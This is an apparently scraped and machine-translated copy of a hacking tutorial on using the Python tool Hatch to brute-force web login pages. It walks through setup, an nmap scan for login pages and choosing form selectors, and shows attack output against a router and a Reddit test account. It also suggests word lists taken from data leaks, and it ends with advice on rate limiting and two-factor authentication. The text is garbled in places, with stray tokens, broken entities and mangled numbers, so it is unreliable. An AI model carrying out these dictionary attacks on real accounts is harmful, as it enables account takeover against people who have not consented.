قالب وردپرس درنا توس
Home / Tips and Tricks / How Brute-Force Logs In Almost Every Website With Hatch «Null Byte :: WonderHowTo

How Brute-Force Logs In Almost Every Website With Hatch «Null Byte :: WonderHowTo



The tactics of brutally forcing a login, i.e. trying many passwords very quickly until the correct one is discovered, can be easy for services such as SSH or Telnet. For something like a website login page, we must first identify different elements of the page. Thanks to a Python tool for brute-forcing websites called Hatch, this process has been simplified in such a way that even a beginner can try.

How Brute-Force Attacks Work

Brute-force attacks take advantage of automation to try far more passwords than a human, and try to break into a system by trial and error. More targeted brute-force attacks use a list of common passwords to speed this up, called dictionary attacks, and using this technique to check for weak passwords is often the first attack a hacker will attempt against a system.

Forcing attack against a service such as SSH, this can easily be done from the command line by tools such as Sshtrix. On a single line in a terminal, it is easy to launch a dictionary attack against a discovered SSH server using the built-in password list, making services with bad passwords very likely to be compromised.

The biggest disadvantage of a dictionary attack is that if the password does not exist in the password list, the attack will fail. If the password used on a target is strong, brute force attacks can quickly become too expensive and too expensive to use because we have to try every possible combination of characters. Another disadvantage is that many services now perform a speed limitation method that detects too many failed login attempts and blocks further attempts for a period that can significantly delay a brute force attack.

Why Brute Force Attacks Are Harder on Websites

Although it is easy to attack a service that uses a username and password through the command line, much more is going on in the code of a website. To design this attack, we need to think about what the script needs to know to do its job.

We want the script to find the correct password for a particular account by entering a guess in the fields on the login page and submitting it until we get a successful result. To do this, we must communicate with the graphical user interface of the login page to enter the information in the correct fields of both the login and password fields.

After we have done this, we must submit the gamble by clicking on the "Login" button on the page. Finally, we need the script to know the difference between failure and success so that we can stop the script and identify the correct password guess.

All of this is much more work and quite confusing for beginners, but after this, brute-force attacks can be done on the login page of most websites, similar to brute-forcing an SSH service.

Hatch for Brute-Forcing Web Logins

Python is an ideal language for automating this type of attack, and Hatch uses Python2 to automate the Chrome web browser to perform a dictionary attack against login of every webpage with a visible login forum. Although some websites with hidden login forums that require scrolling or clicking to display may confuse the script, most sites can easily be targeted using this tool.

When starting Hatch, the script opens a Chrome window for you to inspect the elements of the page that you are targeting. After you have told the script to which site you want to use a brute-force login, it is checked whether the page exists and is accessible. If this is the case, Hatch will ask which login you want to force and then request a list of passwords to try during the attack.

After Hatch has the required information, a second Chrome window is opened and the automation is started for the attack. You can sit back and watch the attack unfold in the Chrome window or in the terminal that is carrying out the attack. In the terminal you can view every attempted password while the script progresses further down the list. While this attack is powerful and useful against a wide range of targets, it can also be prevented by speed limitation and other methods to block excessive login attempts.

What you need

While Hatch cross-platform, it was a bit complicated to set up on some systems. In the end we let Hatch work on a Windows system with a few changes to the script, which we have included here.

To follow this guide, you need a Windows system with Chrome and Python 2 installed. The current, modern version of Python is Python3, so you must ensure that you are using the correct version when you run the script. If you run Hatch with Python3, it will not work correctly.

You also need to install a few dependencies, including a driver, to be able to programmatically communicate with Chrome.

Step 1: Check your version of Python

First we have to install some dependencies. To arrange this, press the Windows key or click on the Start menu and type cmd . After opening a command prompt, verify that Python2 is installed correctly by typing python2 in the terminal window. You should see a result as below. C: python2
λ python2
Python 2.7.13 (vs. 7.13: a06454b1afa1, December 17, 2016, 20:53:40) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>>

If you do not, you can download Python2. After your Python2 is installed, type the following commands to install dependencies:

  C: > pip2 install selenium
C: > pip2 installation requests 

Step 2: Install the Chrome driver

Next, we must install the driver with which we can control Chrome from within the Python program. To do this, we will download a file from from the Chrome Driver website and then create a folder named web drivers on your C drive. Move the downloaded file to this folder. Although you can place it in a different folder, you must change the Python code.

Step 3: Download Hatch & Install

To install Hatch, you can change the folder in your C drive before cloning it to make sure you can find it or change it to another location that you can find . Type cd .. to go to the C-drive of your computer, if you want. You can then download a forked version of Hatch from the GitHub page by opening a terminal window and typing the following.

  C: > git clone https://github.com/nsgodshall/Hatch.git cialis19659022] This forked version has been modified to work on Windows. After the download is complete, you can type  cd Hatch  to change folders in the download folder. 

  C: > cd Hatch 

Step 4: Run Hatch and select your router Log in

Now that we have Hatch on our system and all dependencies are installed, it's time to run Hatch and to see how it works. First, let's view the Help file by performing the following from the Hatch folder.

  C: > python2 main.py -h 

You see an output like the one below.

  C:  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h
Use: main.py [options]

options:
-h, - help view and close this help message
-u USERNAME, --username = USERNAME Choose the username
--usernamesel + USERNAMESEL Choose the username selector
--passsel = PASSSEL Select the password selector
--loginsel = LOGINSEL Choose the button for logging in
--passlist + PASSLIST Enter the folder with the password list
--website = WEBSITE choose a website 

We can view the most important options for Hatch here. First of all, let's choose a target on our local network to attack.

A good device on your local network to test this is something like a router, a printer, or another device with a login page on the network. You can select this by performing an Nmap scan on the network to find all IP addresses that have port 80 open. Although port 80 is the most common web access page, you can also search for ports 81, 8080, 8081, 443 to find the login pages of various devices.

Next, we must search the subnet range so that we can scan the local network. To find this, you can use ipcalc to calculate your subnet range after the local IP address of your computer is found. For example, if your computer has an IP address of 192.168.0.3, you can run ipcalc 192.168.0.3 to get the IP range for all possible IP addresses on that network. In this case that would be 192.168.0.0/24. 19,19199004. Once you know the range, perform the following Nmap scan on your network, with the iprange section changed to add the IP range of your network.

  C: > sudo nmap -p 80.8080.81.8081.443 iprange 

When this scan is returned, any service that displays the port as "open" must host a website. Navigate to someone such as a printer or router where you have permission to log in by entering the IP address followed by a colon and the port number we discovered in Nmap. You should see a login page like this:

Step 5: Identify the entry elements

Now we can perform Hatch, but we still need some more information to carry out this attack. Run Hatch by typing the following command after navigating to the folder where you previously saved the program.

  C: > python2 main.py 

A Google Chrome window should be opened that allows us to navigate to a website that we want to attack and start identifying the parts of the website that we want to manipulate.

  C:  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listens on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

_ _ _ _
| | | | | | | |
| | __ | | __ _ | | _ ___ | | __
| __ | / _` | __ / __ | & # 39; _ 
| | | | (_ | | || (__ | | | |
| _ | | _ |  __, _ |  __  ___ | _ | | _ |
[-] -> V.1.0
[-] -> encoded by Metachar
[-] -> brute force tool

[~] Go to a website: http://202.216.246.99/
[!] Checking if the site exists [OK] 

Enter the URL to the login page of the target site at the first Hatch prompt. It will check whether the website exists and is accessible. Next, we must identify the login and password elements of the website that we are attacking.

On our target login page, right-click on the "Username" element and then click on "Inspect"

Then click on the ellipse (•••) to the left of the window and a drop-down menu appears. Click on "Copy" and then on "Copy selector" to copy what Hatch must select and interact with this element. It should look something like "#username".

Enter the username selector in Hatch and repeat the process with the "Password" selector.

  C:  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listens on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

_ _ _ _
| | | | | | | |
| | __ | | __ _ | | _ ___ | | __
| __ | / _` | __ / __ | & # 39; _ 
| | | | (_ | | || (__ | | | |
| _ | | _ |  __, _ |  __  ___ | _ | | _ |
[-] -> V.1.0
[-] -> encoded by Metachar
[-] -> brute force tool

[~] Go to a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~]   Enter the username selector: #username
[~] Enter the password selector: #passwd
[~] Go to the button Log in button: 

Finally right click on the button & # 39; Register & # 39; to retrieve the selector information and also add it to Hatch.

Now that we have the selected elements, we have & # 39; I will set the username that we are trying to force-force. In this case we just type admin . The final step is to select the default list that comes with Hatch. This is "passlist.txt" by default, so we will use this list with our first attack.

  C:  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listens on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

_ _ _ _
| | | | | | | |
| | __ | | __ _ | | _ ___ | | __
| __ | / _` | __ / __ | & # 39; _ 
| | | | (_ | | || (__ | | | |
| _ | | _ |  __, _ |  __  ___ | _ | | _ |
[-] -> V.1.0
[-] -> encoded by Metachar
[-] -> brute force tool

[~] Go to a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~]   Enter the username selector: #username
[~] Enter the password selector: #passwd
[~] Go to the button Log in button: #login_ok
[~] Enter the username for brute-force: admin
[~] Enter a folder for a password list: passlist.txt

DevTools listerning on ws: //127.0.0.1: 7827 / devtools / browser / 0d90faa9-4f25-41a6-bd30-444cdff7705d

DevTools list on ws: //127.0.0.1: 7848 / devtools / browser / 33d370d5-46db-4d56-b5f4-a78554e07316 

This password list is not huge, but it contains many common passwords. Press Return and Hatch will open a new window to brutally force the password with the dictionary attack. You can view the progress from the terminal window or by viewing the Chrome window that Hatch automates.

  C:  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listens on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

_ _ _ _
| | | | | | | |
| | __ | | __ _ | | _ ___ | | __
| __ | / _` | __ / __ | & # 39; _ 
| | | | (_ | | || (__ | | | |
| _ | | _ |  __, _ |  __  ___ | _ | | _ |
[-] -> V.1.0
[-] -> encoded by Metachar
[-] -> brute force tool

[~] Go to a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~]   Enter the username selector: #username
[~] Enter the password selector: #passwd
[~] Go to the button Log in button: #login_ok
[~] Enter the username for brute-force: admin
[~] Enter a folder for a password list: passlist.txt

DevTools listerning on ws: //127.0.0.1: 7827 / devtools / browser / 0d90faa9-4f25-41a6-bd30-444cdff7705d

DevTools listerning on ws: //127.0.0.1: 7848 / devtools / browser / 33d370d5-46db-4d56-b5f4-a78554e07316
------------------------
Proven password: 123456
for user: admin
------------------------
------------------------
Proven password: password
for user: admin
------------------------
------------------------
Proven password: qwerty
for user: admin
------------------------
------------------------
Proven password: Hackthis1
for user: admin 

Step 6: Update your word list and run an external website

If you are not satisfied with the word list in Hatch, you can add it by opening it in a text editor such as Nano or adding a different word list from each repository of word lists, as leaked from data leaks. After downloading a word list of your choice, you can add it to the "Hatch" folder and select it instead of the standard list.

Once you have a password list that you are happy with, let's test this a standard website. Create a disposable account on Reddit.com or another site and remember the login name. Set the password of the account to one of the word lists.

After setting up the dummy account, run Hatch again and enter reddit.com/login (or the login page for the website you chose). Then paste the selectors into the login, password and button selector. Finally enter the target user name and select the password list with the correct login details. Press Return and the script must open a Chrome window and start automating the attack.

Once the script detects a successful login, it will enter the password that was successful. While the original script tended to skip this and run the wrong password on Windows, my friend Nick modified the code to prevent this from happening in his forked version. If you get strange things from the forked version, you can always try the original Hatch version.

  __ _ _ _
| | | | | | | |
| | __ | | __ _ | | _ ___ | | __
| __ | / _` | __ / __ | & # 39; _ 
| | | | (_ | | || (__ | | | |
| _ | | _ |  __, _ |  __  ___ | _ | | _ |
[-] -> V.1.0
[-] -> encoded by Metachar
[-] -> brute force tool

[~] Go to a website: http://www.reddit.com/login
[!] Checking if site exists [~] Enter the username selector: #loginUsername
[~] Enter the password selector: #loginPassword
[~] Go to the button Log in button: body> div> div> div.PageColumn.PageColumn__right> div> form> fieldset: nth-child (10)> button
[~] Enter the username for brute-force: hackthisaccountNB
[~] Enter a folder for a password list: passlist.txt

DevTools listerning on ws: //127.0.0.1: 11301 / devtools / browser / 6fd2f19e-9fef-4921-863f-d3316ec3b808

DevTools listerning on ws: //127.0.0.1: 11318 / devtools / browser / f8d672c9-8e46-477c-a93d-baf0ea6b50e1
------------------------
Proven password: 123456
for user: hackthisaccountNB
------------------------
------------------------
Proven password: password
for user: hackthisaccountNB
------------------------
------------------------
Proven password: qwerty
for user: hackthisaccountNB
------------------------
AN ELEMENT IS REMOVED FROM THE PAGE SOURCE THIS CAN MEAN 2 THINGS THE PASSWORD HAS BEEN FOUND OR YOU HAVE BEEN LOST FROM ATTEMPT!
LAST PASS attempted below
Password found: qwerty

Have fun 🙂 

How to defend against brute-forcing

Websites have the best ability to defend themselves against these attacks by ensuring that common sense brute-forcing security measures are implemented for dictionary and other types of attacks. Should an ordinary user try to log in 100 times with the wrong password from a strange IP address? The answer is probably no. Take extra care with websites that do not take this type of precaution because they are particularly vulnerable to losing your account information.

On the user side, choosing strong, random passwords and storing them in a password manager can ensure that your password never ends up in a list of passwords. In general, the use of two-factor authentication is, where possible, your best defense against such tactics, as you will be notified of the login attempt. For important accounts, two-factor authentication must always be enabled.

I hope you enjoyed using this manual to use Hatch to automate dictionary attacks against web logons! If you have questions about this tutorial about attacks on the web dictionary or if you have a comment, write it below in the comments or reach me on Twitter @KodyKinzie .

Don't Miss It: Use leaked password databases to create brute-force word lists

-----
Start your journey with White-Hat Hacker with Null Byte & # 39; s Beginner's Guide to Linux class.

Buy now for $ 49.99>

Cover photo and screenshots of Kody / Null Byte




Source link